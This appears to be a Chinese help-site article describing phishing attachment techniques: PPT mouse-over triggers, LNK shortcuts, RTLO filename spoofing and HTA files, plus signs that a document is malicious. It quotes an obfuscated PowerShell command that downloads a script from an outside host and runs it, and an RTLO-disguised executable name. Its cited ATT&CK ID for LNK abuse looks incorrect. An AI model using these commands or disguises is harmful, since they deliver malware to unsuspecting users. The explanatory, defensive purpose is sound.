网络钓鱼攻击文件的几种姿势(2)_卜八电脑最全问题故障中心

捆绑了漏洞的文档，如果需要完美执行，不被察觉，还是比较困难的，不过只要达到目的，只要被打开就完成一大半了。我们可以简单的从几个细节来判断打开的文档是否有问题：

打开后文件变小，因为病毒体被释放，原始文件被干净的文档替换，如果没注意原始大小，也可以从创建时间判断；

文档打开后，office程序自动退出，又自动打开了文档，第二次打开明显快了；

文档运行报错，又或者自行安装你不知道什么的程序；

文档打开缓慢，系统卡顿较长时间；

文档打开后，显示的内容与标题不符，或者是乱码，甚至没什么内容。

随着新冠病毒的爆发，很多行业领域都遭受到带有COVID-19社会工程主题的钓鱼攻击，大多捆绑了勒索软件。

姿势5：PPT手势触发

如果文档一打开就触发已经玩腻了，那么在PPT里设置动作触发一行命令执行，就比较少见了。在历史攻击中就出现过这种利用方式，把ppt配置成ppsx后缀，双击运行后就是播放模式，鼠标只要划过指定区域就会执行一段代码，美中不足的是会被弹框警告，如果不警惕点了启用就中招了。

其在运行程序里设置的代码如下：

powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'cccn.nl'+[char] 0x2F+'c.php',"$env:tempii.jse"); Invoke-Item "$env:tempii.jse"" 姿势6：LNK文件

LNK（快捷方式或符号链接）是引用其他文件或程序的方法，最著名的就是震网病毒（Stuxnet）中的利用，在最新的利用样本也有很多，先看一例。

通过分析工具，把执行代码Dump出来，如下图。

快捷方式修改的利用方式，在MITRE ATT@CK中的ID是T0123，攻击者可以使用这种方式来实现持久化。

姿势7：文件后缀RTLO

伪装文件中有个比较古老的方式，但依然会在攻击中看到它的身影。RTLO字符全名为“RIGHT-TO-LEFT OVERRIDE”，是一个不可显示的控制类字符，其本质是unicode 字符。可以将任意语言的文字内容按倒序排列，最初是用来支持一些从右往左写的语言的文字，比如锕拉伯语，希伯来语。由于它可以重新排列字符的特性，会被攻击者利用从而达到欺骗目标，使得用户运行某些具有危害性的可执行文件。

#在命令行下可以看到完整的文件名 '使用帮助-如何删除ghost-'$'‮''cod.exe

RTLO使用的关键字符就是U+202E，配合修改文件的图标，还是很具有迷惑性的。

姿势8：HTA文件

HTA是HTML Application的缩写，直接将HTML保存成HTA的格式，是一个独立的应用软件，本身就是html应用程序，双击就能运行，却比普通网页权限大得多，它具有桌面程序的所有权限。Cobalt Strike也支持HTA钓鱼文件的生成，另有勒索软件（Locky家族）使用HTA作为传播载体。